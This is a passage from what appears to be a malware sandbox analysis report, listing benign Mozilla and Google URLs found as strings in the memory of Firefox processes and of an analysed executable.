                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/dashboard
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://pdf.js/PdfJsDefaultPreferences.sys
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                          Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.hbomax.com/page/
                          Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.hbomax.com/player/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                          Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/_startedLoadSinceLastUserTyping
                          Source: firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564E000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                          Source: firefox.exe, 00000018.00000003.2731037127.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                          Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
                          Source: firefox.exe, 00000018.00000003.2772758014.000002BA5C5A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
